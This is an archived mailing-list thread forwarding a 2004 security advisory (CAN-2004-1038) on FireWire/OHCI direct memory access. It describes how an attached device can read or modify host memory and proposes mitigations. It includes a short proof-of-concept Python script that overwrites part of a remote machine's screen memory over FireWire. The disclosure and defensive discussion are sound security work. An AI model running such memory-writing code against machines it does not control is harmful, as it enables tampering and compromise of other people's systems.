1 |
Hi, |
2 |
I thought this might be interesting. |
3 |
|
4 |
Ben. |
5 |
|
6 |
|
7 |
---------- Weitergeleitete Nachricht ---------- |
8 |
|
9 |
Subject: FireWire Security issues |
10 |
Date: Dienstag, 16. November 2004 21:30 |
11 |
From: Maximillian Dornseif <dornseif@××××××××××××××××××××××.de> |
12 |
To: freebsd-security@×××××××.org |
13 |
Cc: freebsd-firewire@×××××××.org |
14 |
|
15 |
Hello, |
16 |
|
17 |
looking into the issue described in the advisory below I wonder how to |
18 |
tackle this issues. Primarily |
19 |
I ask myself |
20 |
|
21 |
* is there any reason not to filter all physical memory access by default |
22 |
* what would be the appropriate way to change the filter set? a sysctl? |
23 |
|
24 |
Regards |
25 |
|
26 |
Maximillian Dornseif |
27 |
|
28 |
|
29 |
|
30 |
FireWire/IEEE 1394 direct memory access - CAN-2004-1038 |
31 |
|
32 |
Advisory URL: http://pacsec.jp/advisories.html |
33 |
|
34 |
Subject: Potential system compromise by connected FireWire devices |
35 |
CVE #: CAN-2004-1038 |
36 |
Affected: So far all tested Operating Systems with FireWire support |
37 |
|
38 |
Summary: |
39 |
-------- |
40 |
|
41 |
The FireWire/IEEE 1394 specification allows client devices to directly |
42 |
access host |
43 |
memory, bypassing operating system limitations. A malicious client device |
44 |
can read and modify sensitive memory, causing privilege escalation, |
45 |
information leakage and system compromise. Any system with sensitive |
46 |
information or in an unsecured physical location, esp. public access |
47 |
systems, should re-evaluate their system security and consider additional |
48 |
physical security measures if they are equipped with "FireWire" ports. |
49 |
These ports are also called "iLink" on some Sony models. |
50 |
|
51 |
|
52 |
Overview: |
53 |
--------- |
54 |
|
55 |
In the presentation, "0wned by an iPod" which Maximilian Dornseif from |
56 |
Laboratory for Dependable Distributed Systems at RWTH Aachen University |
57 |
held at the PacSec.jp/core04 conference in Tokyo on Nov 11/12, |
58 |
several new techniques involving the IEEE 1394 interface commonly |
59 |
found on laptops, desktops, and some servers were demonstrated. |
60 |
|
61 |
These techniques could be used in both malicious and beneficial applications. |
62 |
The beneficial applications are in the areas of system forensics and |
63 |
external debugging. The malicious applications are that anyone with |
64 |
physical access to the FireWire port could tamper with system operation |
65 |
and compromise security without measures such as power cycling or rebooting. |
66 |
|
67 |
Systems that counted on physical access limitation such as blocking access |
68 |
to reset and power switches and other measures to limit compromise though |
69 |
such procedures as rebooting, need to re-examine their security. |
70 |
|
71 |
As usual, physical access to a computer usually implies the ability |
72 |
for compromise - however, with this new technique, merely plugging |
73 |
in a malicious FireWire client device with special software |
74 |
could be enough to compromise a target. It becomes easier to |
75 |
violate security if the combination of physical access and FireWire |
76 |
interfaces are available. |
77 |
|
78 |
Security policies and procedures should be re-evaluated |
79 |
and consider this new information where needed. |
80 |
|
81 |
|
82 |
Details: |
83 |
-------- |
84 |
|
85 |
Firewire/1394 host adapters which comply to the OHCI specification |
86 |
allow remote devices to initiate direct DMA based memory access to the |
87 |
host computers main memory. This access takes place completely without |
88 |
involvement of the operating system on the host computer. While |
89 |
OHCI supplies certain methods to allow the filtering of such direct |
90 |
memory access requests, most operating systems do not use this filters |
91 |
or do not provide a way for the user to set such filters. |
92 |
|
93 |
This access can be used to read arbitrary memory from a system connected |
94 |
via FireWire and also to modify arbitrary memory contents. Applications |
95 |
of this capability include capture of screen |
96 |
contents, modification of screen contents, induced system crashes, |
97 |
escalation of process privileges and disabling of password queries. |
98 |
|
99 |
A simple application demonstrating screen blanking would look like |
100 |
this: |
101 |
|
102 |
#!/usr/bin/env python |
103 |
|
104 |
# Blank the medium third of a remote computer's screen via FireWire. |
105 |
|
106 |
# Demonstration for an presentation at PacSec 2004, see http://pacsec.jp/ |
107 |
# http://md.hudora.de/presentations/#firewire-pacsec for further |
108 |
# detail. |
109 |
# --Maximillian Dornseif |
110 |
|
111 |
# Take care - this file uses hard coded addresses for just |
112 |
# everything. You will at least have to change values in the addrs |
113 |
# dictionary to suit your own equipment. |
114 |
|
115 |
import sys, time |
116 |
import fw # import simple mapping of Apples FireWire API to Python |
117 |
# module available at http://c0re.23.nu/c0de/pyfw/ |
118 |
|
119 |
# this structure encodes FireWire GUID, start of the actual screen memory |
120 |
# resolution and bits per pixel |
121 |
# example values for a Dell Latitude X 200 running FreeBSD 5.3 |
122 |
addrs = { 0x00065b80030f21aeL: (0xe8000000L, 1024, 768, 4), } |
123 |
|
124 |
# enumerate devices on the FireWire bus and iterate over them |
125 |
for device in fw.scanbus(): |
126 |
print "Found device %r" % (device.guid) |
127 |
if device.guid not in addrs: |
128 |
print "don't now where to look on that machine, add it in the |
129 |
sourcecode" |
130 |
continue |
131 |
else: |
132 |
base, xres, yres, bpp = addrs[device.guid] |
133 |
|
134 |
# we just delete the medium third of the screen for |
135 |
demonstration purposes |
136 |
pos = base + (xres*bpp*(yres/3)) |
137 |
# iterate over screen lines and overwrite them with \0 |
138 |
while pos < base + (xres*bpp*(yres/3)*2): |
139 |
print "\r-> clearing %08x ..." % (pos), |
140 |
device.write(pos, "\0"*(xres*bpp)), |
141 |
sys.stdout.flush() |
142 |
pos += xres*bpp |
143 |
print done |
144 |
|
145 |
|
146 |
|
147 |
Systems Affected: |
148 |
----------------- |
149 |
|
150 |
We have tested this issue on FreeBSD 5.3 and 5.2.1, MacOS 10.3.5 and |
151 |
10.3.4 and Knoppix 3.6. All of them allowed memory access and had no |
152 |
obvious way to disable this functionality. We observed that Windows |
153 |
2000 Professional crashed whenever an Apple Macintosh Computer running |
154 |
MacOS X was connected. Other operating systems where not tested. |
155 |
|
156 |
Any operating system and any hardware with FireWire interfaces should |
157 |
be considered vulnerable as long as statement from the vendor on OHCI |
158 |
filters or similar means of access control are available. Even if the |
159 |
operating system in question does not support the interface, compromise |
160 |
may still be possible if the hardware is powered. |
161 |
|
162 |
|
163 |
Fix: |
164 |
---- |
165 |
|
166 |
On some systems that require untrusted/unauthenticated physical |
167 |
access by strangers and still require restricted operations, removal |
168 |
of wire headers connecting external case FireWire jacks may provide |
169 |
some limited remigration. |
170 |
|
171 |
On laptops epoxy may be used to permanently disable the external jack |
172 |
if such loss of functionality can be tolerated. |
173 |
|
174 |
The primary precaution is that employees should be warned that they |
175 |
should not plug unknown/untrusted FireWire devices into computers |
176 |
containing sensitive information. |
177 |
|
178 |
Operating system vendors should supply users with a way to control |
179 |
OHCI filters. Default configurations should deny all memory access via |
180 |
FireWire. |
181 |
|
182 |
|
183 |
Credits: |
184 |
-------- |
185 |
|
186 |
* Firestarter by Quinn "The Eskimo!" for demonstrating the potential |
187 |
of FireWire to us - http://www.quinn.echidna.id.au/Quinn/WWW/Hacks.html |
188 |
* Hidetoshi Shimokawa for his FreeBSD FireWire Driver and his |
189 |
revealing post "FireWire for kernel hackers" - |
190 |
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=597886+0+archive/2002/freebsd-ha |
191 |
ckers/20020414.freebsd-hackers * |
192 |
|
193 |
* Kerneltrap for pointing us to FreeBSD FireWire drivers |
194 |
- http://kerneltrap.org/node/view/145 |
195 |
|
196 |
|
197 |
Contact: |
198 |
-------- |
199 |
|
200 |
Maximillian Dornseif |
201 |
Laboratory for Dependable Distributed Systems |
202 |
RWTH Aachen University, Germany |
203 |
email: dornseif@××××××××××××××××××××××.de |
204 |
Phone: +49-241-80-21431 |
205 |
Web: http://md.hudora.de/ |
206 |
|
207 |
History: |
208 |
-------- |
209 |
|
210 |
- 2004-10-26 initial disclosure |
211 |
- 2004-11-15 updated to contain executive sumary, more details, |
212 |
example code, history and credits section |
213 |
- 2004-11-16 CAN-2004-1038 has been assigned to this issue |
214 |
|
215 |
|
216 |
_______________________________________________ |
217 |
freebsd-security@×××××××.org mailing list |
218 |
http://lists.freebsd.org/mailman/listinfo/freebsd-security |
219 |
To unsubscribe, send any mail to "freebsd-security-unsubscribe@×××××××.org" |
220 |
|
221 |
------------------------------------------------------- |
222 |
|
223 |
-- |
224 |
gentoo-security@g.o mailing list |